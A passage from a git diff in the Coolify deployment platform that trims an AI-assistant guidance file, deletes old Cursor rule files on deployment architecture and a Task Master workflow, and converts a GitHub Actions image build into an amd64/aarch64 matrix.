requirements prevent database connection errors + +### Building UI +→ `.ai/patterns/frontend-patterns.md` + `.ai/patterns/form-components.md` +- Livewire 3.5.20 with server-side state +- Alpine.js for client interactions +- Tailwind CSS 4.1.4 styling +- Form components with `canGate` authorization + +### Database Work +→ `.ai/patterns/database-patterns.md` +- Eloquent ORM patterns +- Migration best practices +- Relationship definitions +- Query optimization + +### Security & Authorization +→ `.ai/patterns/security-patterns.md` + `.ai/patterns/form-components.md` +- Team-based access control +- Policy and gate patterns +- Form authorization (`canGate`, `canResource`) +- API security with Sanctum + +### Laravel-Specific +→ `.ai/development/laravel-boost.md` +- Laravel 12.4.1 patterns +- Livewire 3 best practices +- Pest testing patterns +- Laravel conventions + +### Version Numbers +→ `.ai/core/technology-stack.md` +- **SINGLE SOURCE OF TRUTH** for all version numbers +- Laravel 12.4.1, PHP 8.4.7, Tailwind 4.1.4, etc. +- Never duplicate versions - always reference this file + +## Critical Patterns (Always Follow) + +### Testing Commands +```bash +# Unit tests (no database, outside Docker) +./vendor/bin/pest tests/Unit + +# Feature tests (requires database, inside Docker) +docker exec coolify php artisan test +``` + +**NEVER** run Feature tests outside Docker - they will fail with database connection errors. + +### Form Authorization +ALWAYS include authorization on form components: +```blade + +``` + +### Livewire Components +MUST have exactly ONE root element. No exceptions. + +### Version Numbers +Use exact versions from `technology-stack.md`: +- ✅ Laravel 12.4.1 +- ❌ Laravel 12 or "v12" + +### Code Style +```bash +# Always run before committing +./vendor/bin/pint +``` + +## For AI Assistants + +### Important Notes +1. **Single Source of Truth**: Each piece of information exists in ONE location only +2. **Cross-Reference, Don't Duplicate**: Link to other files instead of copying content +3. **Version Precision**: Always use exact versions from `technology-stack.md` +4. **Docker for Feature Tests**: This is non-negotiable for database-dependent tests +5. **Form Authorization**: Security requirement, not optional + +### When to Use Which File +- **Quick commands**: `CLAUDE.md` or `development-workflow.md` +- **Detailed patterns**: Topic-specific files in `.ai/patterns/` +- **Testing**: `.ai/development/testing-patterns.md` +- **Laravel specifics**: `.ai/development/laravel-boost.md` +- **Versions**: `.ai/core/technology-stack.md` + +## Maintaining Documentation + +When updating documentation: +1. Read `.ai/meta/maintaining-docs.md` first +2. Follow single source of truth principle +3. Update cross-references when moving content +4. Test all links work +5. See `.ai/meta/sync-guide.md` for sync guidelines + +## Migration Note + +This file replaces all previous `.cursor/rules/*.mdc` files. All content has been migrated to `.ai/` directory for better organization and to serve as single source of truth for all AI tools (Claude Code, Cursor IDE, etc.). diff --git a/.cursor/rules/cursor_rules.mdc b/.cursor/rules/cursor_rules.mdc deleted file mode 100644 index 9edccd496..000000000 --- a/.cursor/rules/cursor_rules.mdc +++ /dev/null @@ -1,59 +0,0 @@ ---- -description: Guidelines for creating and maintaining Cursor rules to ensure consistency and effectiveness. -globs: .cursor/rules/*.mdc -alwaysApply: true ---- - -# Cursor Rules Maintenance Guide - -> **Important**: These rules in `.cursor/rules/` are shared between Cursor IDE and other AI assistants. Changes here should be reflected in **[CLAUDE.md](mdc:CLAUDE.md)** when they affect core workflows or patterns. -> -> **Synchronization Guide**: See **[.AI_INSTRUCTIONS_SYNC.md](mdc:.AI_INSTRUCTIONS_SYNC.md)** for detailed guidelines on maintaining consistency between CLAUDE.md and .cursor/rules/. - -- **Required Rule Structure:** - ```markdown - --- - description: Clear, one-line description of what the rule enforces - globs: path/to/files/*.ext, other/path/**/* - alwaysApply: boolean - --- - - - **Main Points in Bold** - - Sub-points with details - - Examples and explanations - ``` - -- **File References:** - - Use `[filename](mdc:path/to/file)` ([filename](mdc:filename)) to reference files - - Example: [prisma.mdc](mdc:.cursor/rules/prisma.mdc) for rule references - - Example: [schema.prisma](mdc:prisma/schema.prisma) for code references - -- **Code Examples:** - - Use language-specific code blocks - ```typescript - // ✅ DO: Show good examples - const goodExample = true; - - // ❌ DON'T: Show anti-patterns - const badExample = false; - ``` - -- **Rule Content Guidelines:** - - Start with high-level overview - - Include specific, actionable requirements - - Show examples of correct implementation - - Reference existing code when possible - - Keep rules DRY by referencing other rules - -- **Rule Maintenance:** - - Update rules when new patterns emerge - - Add examples from actual codebase - - Remove outdated patterns - - Cross-reference related rules - -- **Best Practices:** - - Use bullet points for clarity - - Keep descriptions concise - - Include both DO and DON'T examples - - Reference actual code over theoretical examples - - Use consistent formatting across rules \ No newline at end of file diff --git a/.cursor/rules/deployment-architecture.mdc b/.cursor/rules/deployment-architecture.mdc deleted file mode 100644 index 35ae6699b..000000000 --- a/.cursor/rules/deployment-architecture.mdc +++ /dev/null @@ -1,310 +0,0 @@ ---- -description: Docker orchestration, deployment workflows, and containerization patterns -globs: app/Jobs/*.php, app/Actions/Application/*.php, app/Actions/Server/*.php, docker/*.*, *.yml, *.yaml -alwaysApply: false ---- -# Coolify Deployment Architecture - -## Deployment Philosophy - -Coolify orchestrates **Docker-based deployments** across multiple servers with automated configuration generation, zero-downtime deployments, and comprehensive monitoring. - -## Core Deployment Components - -### Deployment Models -- **[Application.php](mdc:app/Models/Application.php)** - Main application entity with deployment configurations -- **[ApplicationDeploymentQueue.php](mdc:app/Models/ApplicationDeploymentQueue.php)** - Deployment job orchestration -- **[Service.php](mdc:app/Models/Service.php)** - Multi-container service definitions -- **[Server.php](mdc:app/Models/Server.php)** - Target deployment infrastructure - -### Infrastructure Management -- **[PrivateKey.php](mdc:app/Models/PrivateKey.php)** - SSH key management for secure server access -- **[StandaloneDocker.php](mdc:app/Models/StandaloneDocker.php)** - Single container deployments -- **[SwarmDocker.php](mdc:app/Models/SwarmDocker.php)** - Docker Swarm orchestration - -## Deployment Workflow - -### 1. Source Code Integration -``` -Git Repository → Webhook → Coolify → Build & Deploy -``` - -#### Source Control Models -- **[GithubApp.php](mdc:app/Models/GithubApp.php)** - GitHub integration and webhooks -- **[GitlabApp.php](mdc:app/Models/GitlabApp.php)** - GitLab CI/CD integration - -#### Deployment Triggers -- **Git push** to configured branches -- **Manual deployment** via UI -- **Scheduled deployments** via cron -- **API-triggered** deployments - -### 2. Build Process -``` -Source Code → Docker Build → Image Registry → Deployment -``` - -#### Build Configurations -- **Dockerfile detection** and custom Dockerfile support -- **Buildpack integration** for framework detection -- **Multi-stage builds** for optimization -- **Cache layer** management for faster builds - -### 3. Deployment Orchestration -``` -Queue Job → Configuration Generation → Container Deployment → Health Checks -``` - -## Deployment Actions - -### Location: [app/Actions/](mdc:app/Actions) - -#### Application Deployment Actions -- **Application/** - Core application deployment logic -- **Docker/** - Docker container management -- **Service/** - Multi-container service orchestration -- **Proxy/** - Reverse proxy configuration - -#### Database Actions -- **Database/** - Database deployment and management -- Automated backup scheduling -- Connection management and health checks - -#### Server Management Actions -- **Server/** - Server provisioning and configuration -- SSH connection establishment -- Docker daemon management - -## Configuration Generation - -### Dynamic Configuration -- **[ConfigurationGenerator.php](mdc:app/Services/ConfigurationGenerator.php)** - Generates deployment configurations -- **[ConfigurationRepository.php](mdc:app/Services/ConfigurationRepository.php)** - Configuration management - -### Generated Configurations -#### Docker Compose Files -```yaml -# Generated docker-compose.yml structure -version: '3.8' -services: - app: - image: ${APP_IMAGE} - environment: - - ${ENV_VARIABLES} - labels: - - traefik.enable=true - - traefik.http.routers.app.rule=Host(`${FQDN}`) - volumes: - - ${VOLUME_MAPPINGS} - networks: - - coolify -``` - -#### Nginx Configurations -- **Reverse proxy** setup -- **SSL termination** with automatic certificates -- **Load balancing** for multiple instances -- **Custom headers** and routing rules - -## Container Orchestration - -### Docker Integration -- **[DockerImageParser.php](mdc:app/Services/DockerImageParser.php)** - Parse and validate Docker images -- **Container lifecycle** management -- **Resource allocation** and limits -- **Network isolation** and communication - -### Volume Management -- **[LocalFileVolume.php](mdc:app/Models/LocalFileVolume.php)** - Persistent file storage -- **[LocalPersistentVolume.php](mdc:app/Models/LocalPersistentVolume.php)** - Data persistence -- **Backup integration** for volume data - -### Network Configuration -- **Custom Docker networks** for isolation -- **Service discovery** between containers -- **Port mapping** and exposure -- **SSL/TLS termination** - -## Environment Management - -### Environment Isolation -- **[Environment.php](mdc:app/Models/Environment.php)** - Development, staging, production environments -- **[EnvironmentVariable.php](mdc:app/Models/EnvironmentVariable.php)** - Application-specific variables -- **[SharedEnvironmentVariable.php](mdc:app/Models/SharedEnvironmentVariable.php)** - Cross-application variables - -### Configuration Hierarchy -``` -Instance Settings → Server Settings → Project Settings → Application Settings -``` - -## Preview Environments - -### Git-Based Previews -- **[ApplicationPreview.php](mdc:app/Models/ApplicationPreview.php)** - Preview environment management -- **Automatic PR/MR previews** for feature branches -- **Isolated environments** for testing -- **Automatic cleanup** after merge/close - -### Preview Workflow -``` -Feature Branch → Auto-Deploy → Preview URL → Review → Cleanup -``` - -## SSL & Security - -### Certificate Management -- **[SslCertificate.php](mdc:app/Models/SslCertificate.php)** - SSL certificate automation -- **Let's Encrypt** integration for free certificates -- **Custom certificate** upload support -- **Automatic renewal** and monitoring - -### Security Patterns -- **Private Docker networks** for container isolation -- **SSH key-based** server authentication -- **Environment variable** encryption -- **Access control** via team permissions - -## Backup & Recovery - -### Database Backups -- **[ScheduledDatabaseBackup.php](mdc:app/Models/ScheduledDatabaseBackup.php)** - Automated database backups -- **[ScheduledDatabaseBackupExecution.php](mdc:app/Models/ScheduledDatabaseBackupExecution.php)** - Backup execution tracking -- **S3-compatible storage** for backup destinations - -### Application Backups -- **Volume snapshots** for persistent data -- **Configuration export** for disaster recovery -- **Cross-region replication** for high availability - -## Monitoring & Logging - -### Real-Time Monitoring -- **[ActivityMonitor.php](mdc:app/Livewire/ActivityMonitor.php)** - Live deployment monitoring -- **WebSocket-based** log streaming -- **Container health checks** and alerts -- **Resource usage** tracking - -### Deployment Logs -- **Build process** logging -- **Container startup** logs -- **Application runtime** logs -- **Error tracking** and alerting - -## Queue System - -### Background Jobs -Location: [app/Jobs/](mdc:app/Jobs) -- **Deployment jobs** for async processing -- **Server monitoring** jobs -- **Backup scheduling** jobs -- **Notification delivery** jobs - -### Queue Processing -- **Redis-backed** job queues -- **Laravel Horizon** for queue monitoring -- **Failed job** retry mechanisms -- **Queue worker** auto-scaling - -## Multi-Server Deployment - -### Server Types -- **Standalone servers** - Single Docker host -- **Docker Swarm** - Multi-node orchestration -- **Remote servers** - SSH-based deployment -- **Local development** - Docker Desktop integration - -### Load Balancing -- **Traefik integration** for automatic load balancing -- **Health check** based routing -- **Blue-green deployments** for zero downtime -- **Rolling updates** with configurable strategies - -## Deployment Strategies - -### Zero-Downtime Deployment -``` -Old Container → New Container Build → Health Check → Traffic Switch → Old Container Cleanup -``` - -### Blue-Green Deployment -- **Parallel environments** for safe deployments -- **Instant rollback** capability -- **Database migration** handling -- **Configuration synchronization** - -### Rolling Updates -- **Gradual instance** replacement -- **Configurable update** strategy -- **Automatic rollback** on failure -- **Health check** validation - -## API Integration - -### Deployment API -Routes: [routes/api.php](mdc:routes/api.php) -- **RESTful endpoints** for deployment management -- **Webhook receivers** for CI/CD integration -- **Status reporting** endpoints -- **Deployment triggering** via API - -### Authentication -- **Laravel Sanctum** API tokens -- **Team-based** access control -- **Rate limiting** for API calls -- **Audit logging** for API usage - -## Error Handling & Recovery - -### Deployment Failure Recovery -- **Automatic rollback** on deployment failure -- **Health check** failure handling -- **Container crash** recovery -- **Resource exhaustion** protection - -### Monitoring & Alerting -- **Failed deployment** notifications -- **Resource threshold** alerts -- **SSL certificate** expiry warnings -- **Backup failure** notifications - -## Performance Optimization - -### Build Optimization -- **Docker layer** caching -- **Multi-stage builds** for smaller images -- **Build artifact** reuse -- **Parallel build** processing - -### Runtime Optimization -- **Container resource** limits -- **Auto-scaling** based on metrics -- **Connection pooling** for databases -- **CDN integration** for static assets - -## Compliance & Governance - -### Audit Trail -- **Deployment history** tracking -- **Configuration changes** logging -- **User action** auditing -- **Resource access** monitoring - -### Backup Compliance -- **Retention policies** for backups -- **Encryption at rest** for sensitive data -- **Cross-region** backup replication -- **Recovery testing** automation - -## Integration Patterns - -### CI/CD Integration -- **GitHub Actions** compatibility -- **GitLab CI** pipeline integration -- **Custom webhook** endpoints -- **Build status** reporting - -### External Services -- **S3-compatible** storage integration -- **External database** connections -- **Third-party monitoring** tools -- **Custom notification** channels diff --git a/.cursor/rules/dev_workflow.mdc b/.cursor/rules/dev_workflow.mdc deleted file mode 100644 index 003251d8a..000000000 --- a/.cursor/rules/dev_workflow.mdc +++ /dev/null @@ -1,219 +0,0 @@ ---- -description: Guide for using Task Master to manage task-driven development workflows -globs: **/* -alwaysApply: true ---- -# Task Master Development Workflow - -This guide outlines the typical process for using Task Master to manage software development projects. - -## Primary Interaction: MCP Server vs. CLI - -Task Master offers two primary ways to interact: - -1. **MCP Server (Recommended for Integrated Tools)**: - - For AI agents and integrated development environments (like Cursor), interacting via the **MCP server is the preferred method**. - - The MCP server exposes Task Master functionality through a set of tools (e.g., `get_tasks`, `add_subtask`). - - This method offers better performance, structured data exchange, and richer error handling compared to CLI parsing. - - Refer to [`mcp.mdc`](mdc:.cursor/rules/mcp.mdc) for details on the MCP architecture and available tools. - - A comprehensive list and description of MCP tools and their corresponding CLI commands can be found in [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc). - - **Restart the MCP server** if core logic in `scripts/modules` or MCP tool/direct function definitions change. - -2. **`task-master` CLI (For Users & Fallback)**: - - The global `task-master` command provides a user-friendly interface for direct terminal interaction. - - It can also serve as a fallback if the MCP server is inaccessible or a specific function isn't exposed via MCP. - - Install globally with `npm install -g task-master-ai` or use locally via `npx task-master-ai ...`. - - The CLI commands often mirror the MCP tools (e.g., `task-master list` corresponds to `get_tasks`). - - Refer to [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc) for a detailed command reference. - -## Standard Development Workflow Process - -- Start new projects by running `initialize_project` tool / `task-master init` or `parse_prd` / `task-master parse-prd --input=''` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) to generate initial tasks.json -- Begin coding sessions with `get_tasks` / `task-master list` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) to see current tasks, status, and IDs -- Determine the next task to work on using `next_task` / `task-master next` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)). -- Analyze task complexity with `analyze_project_complexity` / `task-master analyze-complexity --research` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) before breaking down tasks -- Review complexity report using `complexity_report` / `task-master complexity-report` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)). -- Select tasks based on dependencies (all marked 'done'), priority level, and ID order -- Clarify tasks by checking task files in tasks/ directory or asking for user input -- View specific task details using `get_task` / `task-master show ` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) to understand implementation requirements -- Break down complex tasks using `expand_task` / `task-master expand --id= --force --research` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) with appropriate flags like `--force` (to replace existing subtasks) and `--research`. -- Clear existing subtasks if needed using `clear_subtasks` / `task-master clear-subtasks --id=` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) before regenerating -- Implement code following task details, dependencies, and project standards -- Verify tasks according to test strategies before marking as complete (See [`tests.mdc`](mdc:.cursor/rules/tests.mdc)) -- Mark completed tasks with `set_task_status` / `task-master set-status --id= --status=done` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) -- Update dependent tasks when implementation differs from original plan using `update` / `task-master update --from= --prompt="..."` or `update_task` / `task-master update-task --id= --prompt="..."` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) -- Add new tasks discovered during implementation using `add_task` / `task-master add-task --prompt="..." --research` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)). -- Add new subtasks as needed using `add_subtask` / `task-master add-subtask --parent= --title="..."` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)). -- Append notes or details to subtasks using `update_subtask` / `task-master update-subtask --id= --prompt='Add implementation notes here...\nMore details...'` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)). -- Generate task files with `generate` / `task-master generate` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) after updating tasks.json -- Maintain valid dependency structure with `add_dependency`/`remove_dependency` tools or `task-master add-dependency`/`remove-dependency` commands, `validate_dependencies` / `task-master validate-dependencies`, and `fix_dependencies` / `task-master fix-dependencies` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) when needed -- Respect dependency chains and task priorities when selecting work -- Report progress regularly using `get_tasks` / `task-master list` - -## Task Complexity Analysis - -- Run `analyze_project_complexity` / `task-master analyze-complexity --research` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) for comprehensive analysis -- Review complexity report via `complexity_report` / `task-master complexity-report` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) for a formatted, readable version. -- Focus on tasks with highest complexity scores (8-10) for detailed breakdown -- Use analysis results to determine appropriate subtask allocation -- Note that reports are automatically used by the `expand_task` tool/command - -## Task Breakdown Process - -- Use `expand_task` / `task-master expand --id=`. It automatically uses the complexity report if found, otherwise generates default number of subtasks. -- Use `--num=` to specify an explicit number of subtasks, overriding defaults or complexity report recommendations. -- Add `--research` flag to leverage Perplexity AI for research-backed expansion. -- Add `--force` flag to clear existing subtasks before generating new ones (default is to append). -- Use `--prompt=""` to provide additional context when needed. -- Review and adjust generated subtasks as necessary. -- Use `expand_all` tool or `task-master expand --all` to expand multiple pending tasks at once, respecting flags like `--force` and `--research`. -- If subtasks need complete replacement (regardless of the `--force` flag on `expand`), clear them first with `clear_subtasks` / `task-master clear-subtasks --id=`. - -## Implementation Drift Handling - -- When implementation differs significantly from planned approach -- When future tasks need modification due to current implementation choices -- When new dependencies or requirements emerge -- Use `update` / `task-master update --from= --prompt='\nUpdate context...' --research` to update multiple future tasks. -- Use `update_task` / `task-master update-task --id= --prompt='\nUpdate context...' --research` to update a single specific task. - -## Task Status Management - -- Use 'pending' for tasks ready to be worked on -- Use 'done' for completed and verified tasks -- Use 'deferred' for postponed tasks -- Add custom status values as needed for project-specific workflows - -## Task Structure Fields - -- **id**: Unique identifier for the task (Example: `1`, `1.1`) -- **title**: Brief, descriptive title (Example: `"Initialize Repo"`) -- **description**: Concise summary of what the task involves (Example: `"Create a new repository, set up initial structure."`) -- **status**: Current state of the task (Example: `"pending"`, `"done"`, `"deferred"`) -- **dependencies**: IDs of prerequisite tasks (Example: `[1, 2.1]`) - - Dependencies are displayed with status indicators (✅ for completed, ⏱️ for pending) - - This helps quickly identify which prerequisite tasks are blocking work -- **priority**: Importance level (Example: `"high"`, `"medium"`, `"low"`) -- **details**: In-depth implementation instructions (Example: `"Use GitHub client ID/secret, handle callback, set session token."`) -- **testStrategy**: Verification approach (Example: `"Deploy and call endpoint to confirm 'Hello World' response."`) -- **subtasks**: List of smaller, more specific tasks (Example: `[{"id": 1, "title": "Configure OAuth", ...}]`) -- Refer to task structure details (previously linked to `tasks.mdc`). - -## Configuration Management (Updated) - -Taskmaster configuration is managed through two main mechanisms: - -1. **`.taskmasterconfig` File (Primary):** - * Located in the project root directory. - * Stores most configuration settings: AI model selections (main, research, fallback), parameters (max tokens, temperature), logging level, default subtasks/priority, project name, etc. - * **Managed via `task-master models --setup` command.** Do not edit manually unless you know what you are doing. - * **View/Set specific models via `task-master models` command or `models` MCP tool.** - * Created automatically when you run `task-master models --setup` for the first time. - -2. **Environment Variables (`.env` / `mcp.json`):** - * Used **only** for sensitive API keys and specific endpoint URLs. - * Place API keys (one per provider) in a `.env` file in the project root for CLI usage. - * For MCP/Cursor integration, configure these keys in the `env` section of `.cursor/mcp.json`. - * Available keys/variables: See `assets/env.example` or the Configuration section in the command reference (previously linked to `taskmaster.mdc`). - -**Important:** Non-API key settings (like model selections, `MAX_TOKENS`, `TASKMASTER_LOG_LEVEL`) are **no longer configured via environment variables**. Use the `task-master models` command (or `--setup` for interactive configuration) or the `models` MCP tool. -**If AI commands FAIL in MCP** verify that the API key for the selected provider is present in the `env` section of `.cursor/mcp.json`. -**If AI commands FAIL in CLI** verify that the API key for the selected provider is present in the `.env` file in the root of the project. - -## Determining the Next Task - -- Run `next_task` / `task-master next` to show the next task to work on. -- The command identifies tasks with all dependencies satisfied -- Tasks are prioritized by priority level, dependency count, and ID -- The command shows comprehensive task information including: - - Basic task details and description - - Implementation details - - Subtasks (if they exist) - - Contextual suggested actions -- Recommended before starting any new development work -- Respects your project's dependency structure -- Ensures tasks are completed in the appropriate sequence -- Provides ready-to-use commands for common task actions - -## Viewing Specific Task Details - -- Run `get_task` / `task-master show ` to view a specific task. -- Use dot notation for subtasks: `task-master show 1.2` (shows subtask 2 of task 1) -- Displays comprehensive information similar to the next command, but for a specific task -- For parent tasks, shows all subtasks and their current status -- For subtasks, shows parent task information and relationship -- Provides contextual suggested actions appropriate for the specific task -- Useful for examining task details before implementation or checking status - -## Managing Task Dependencies - -- Use `add_dependency` / `task-master add-dependency --id= --depends-on=` to add a dependency. -- Use `remove_dependency` / `task-master remove-dependency --id= --depends-on=` to remove a dependency. -- The system prevents circular dependencies and duplicate dependency entries -- Dependencies are checked for existence before being added or removed -- Task files are automatically regenerated after dependency changes -- Dependencies are visualized with status indicators in task listings and files - -## Iterative Subtask Implementation - -Once a task has been broken down into subtasks using `expand_task` or similar methods, follow this iterative process for implementation: - -1. **Understand the Goal (Preparation):** - * Use `get_task` / `task-master show ` (see [`taskmaster.mdc`](mdc:.cursor/rules/taskmaster.mdc)) to thoroughly understand the specific goals and requirements of the subtask. - -2. **Initial Exploration & Planning (Iteration 1):** - * This is the first attempt at creating a concrete implementation plan. - * Explore the codebase to identify the precise files, functions, and even specific lines of code that will need modification. - * Determine the intended code changes (diffs) and their locations. - * Gather *all* relevant details from this exploration phase. - -3. **Log the Plan:** - * Run `update_subtask` / `task-master update-subtask --id= --prompt=''`. - * Provide the *complete and detailed* findings from the exploration phase in the prompt. Include file paths, line numbers, proposed diffs, reasoning, and any potential challenges identified. Do not omit details. The goal is to create a rich, timestamped log within the subtask's `details`. - -4. **Verify the Plan:** - * Run `get_task` / `task-master show ` again to confirm that the detailed implementation plan has been successfully appended to the subtask's details. - -5. **Begin Implementation:** - * Set the subtask status using `set_task_status` / `task-master set-status --id= --status=in-progress`. - * Start coding based on the logged plan. - -6. **Refine and Log Progress (Iteration 2+):** - * As implementation progresses, you will encounter challenges, discover nuances, or confirm successful approaches. - * **Before appending new information**: Briefly review the *existing* details logged in the subtask (using `get_task` or recalling from context) to ensure the update adds fresh insights and avoids redundancy. - * **Regularly** use `update_subtask` / `task-master update-subtask --id= --prompt='\n- What worked...\n- What didn't work...'` to append new findings. - * **Crucially, log:** - * What worked ("fundamental truths" discovered). - * What didn't work and why (to avoid repeating mistakes). - * Specific code snippets or configurations that were successful. - * Decisions made, especially if confirmed with user input. - * Any deviations from the initial plan and the reasoning. - * The objective is to continuously enrich the subtask's details, creating a log of the implementation journey that helps the AI (and human developers) learn, adapt, and avoid repeating errors. - -7. **Review & Update Rules (Post-Implementation):** - * Once the implementation for the subtask is functionally complete, review all code changes and the relevant chat history. - * Identify any new or modified code patterns, conventions, or best practices established during the implementation. - * Create new or update existing rules following internal guidelines (previously linked to `cursor_rules.mdc` and `self_improve.mdc`). - -8. **Mark Task Complete:** - * After verifying the implementation and updating any necessary rules, mark the subtask as completed: `set_task_status` / `task-master set-status --id= --status=done`. - -9. **Commit Changes (If using Git):** - * Stage the relevant code changes and any updated/new rule files (`git add .`). - * Craft a comprehensive Git commit message summarizing the work done for the subtask, including both code implementation and any rule adjustments. - * Execute the commit command directly in the terminal (e.g., `git commit -m 'feat(module): Implement feature X for subtask \n\n- Details about changes...\n- Updated rule Y for pattern Z'`). - * Consider if a Changeset is needed according to internal versioning guidelines (previously linked to `changeset.mdc`). If so, run `npm run changeset`, stage the generated file, and amend the commit or create a new one. - -10. **Proceed to Next Subtask:** - * Identify the next subtask (e.g., using `next_task` / `task-master next`). - -## Code Analysis & Refactoring Techniques - -- **Top-Level Function Search**: - - Useful for understanding module structure or planning refactors. - - Use grep/ripgrep to find exported functions/constants: - `rg "export (async function|function|const) \w+"` or similar patterns. - - Can help compare functions between files during migrations or identify potential naming conflicts. - ---- -*This workflow provides a general guideline. Adapt it based on your specific project needs and team practices.* \ No newline at end of file diff --git a/.cursor/rules/self_improve.mdc b/.cursor/rules/self_improve.mdc deleted file mode 100644 index 2bebaec75..000000000 --- a/.cursor/rules/self_improve.mdc +++ /dev/null @@ -1,59 +0,0 @@ ---- -description: Guidelines for continuously improving Cursor rules based on emerging code patterns and best practices. -globs: **/* -alwaysApply: true ---- - -- **Rule Improvement Triggers:** - - New code patterns not covered by existing rules - - Repeated similar implementations across files - - Common error patterns that could be prevented - - New libraries or tools being used consistently - - Emerging best practices in the codebase - -- **Analysis Process:** - - Compare new code with existing rules - - Identify patterns that should be standardized - - Look for references to external documentation - - Check for consistent error handling patterns - - Monitor test patterns and coverage - -- **Rule Updates:** - - **Add New Rules When:** - - A new technology/pattern is used in 3+ files - - Common bugs could be prevented by a rule - - Code reviews repeatedly mention the same feedback - - New security or performance patterns emerge - - - **Modify Existing Rules When:** - - Better examples exist in the codebase - - Additional edge cases are discovered - - Related rules have been updated - - Implementation details have changed - - -- **Rule Quality Checks:** - - Rules should be actionable and specific - - Examples should come from actual code - - References should be up to date - - Patterns should be consistently enforced - -- **Continuous Improvement:** - - Monitor code review comments - - Track common development questions - - Update rules after major refactors - - Add links to relevant documentation - - Cross-reference related rules - -- **Rule Deprecation:** - - Mark outdated patterns as deprecated - - Remove rules that no longer apply - - Update references to deprecated rules - - Document migration paths for old patterns - -- **Documentation Updates:** - - Keep examples synchronized with code - - Update references to external docs - - Maintain links between related rules - - Document breaking changes -Follow [cursor_rules.mdc](mdc:.cursor/rules/cursor_rules.mdc) for proper rule formatting and structure. diff --git a/.github/workflows/coolify-helper-next.yml b/.github/workflows/coolify-helper-next.yml index ba8a69d28..fec54d54a 100644 --- a/.github/workflows/coolify-helper-next.yml +++ b/.github/workflows/coolify-helper-next.yml @@ -17,8 +17,17 @@ env: IMAGE_NAME: "coollabsio/coolify-helper" jobs: - amd64: - runs-on: ubuntu-latest + build-push: + strategy: + matrix: + include: + - arch: amd64 + platform: linux/amd64 + runner: ubuntu-24.04 + - arch: aarch64 + platform: linux/aarch64 + runner: ubuntu-24.04-arm + runs-on: ${{ matrix.runner }} steps: - uses: actions/checkout@v5 with: @@ -43,60 +52,22 @@ jobs: run: | echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getHelperVersion.php)"|xargs >> $GITHUB_OUTPUT - - name: Build and Push Image + - name: Build and Push Image (${{ matrix.arch }}) uses: docker/build-push-action@v6 with: context: . file: docker/coolify-helper/Dockerfile - platforms: linux/amd64 + platforms: ${{ matrix.platform }} push: true tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next - labels: | - coolify.managed=true - aarch64: - runs-on: [ self-hosted, arm64 ] - steps: - - uses: actions/checkout@v5 - with: - persist-credentials: false - - - name: Login to ${{ env.GITHUB_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.GITHUB_REGISTRY }} - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Login to ${{ env.DOCKER_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.DOCKER_REGISTRY }} - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_TOKEN }} - - - name: Get Version - id: version - run: | - echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getHelperVersion.php)"|xargs >> $GITHUB_OUTPUT - - - name: Build and Push Image - uses: docker/build-push-action@v6 - with: - context: . - file: docker/coolify-helper/Dockerfile - platforms: linux/aarch64 - push: true - tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-${{ matrix.arch }} + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-${{ matrix.arch }} labels: | coolify.managed=true merge-manifest: - runs-on: ubuntu-latest - needs: [ amd64, aarch64 ] + runs-on: ubuntu-24.04 + needs: build-push steps: - uses: actions/checkout@v5 with: @@ -126,14 +97,16 @@ jobs: - name: Create & publish manifest on ${{ env.GITHUB_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-amd64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:next - name: Create & publish manifest on ${{ env.DOCKER_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION 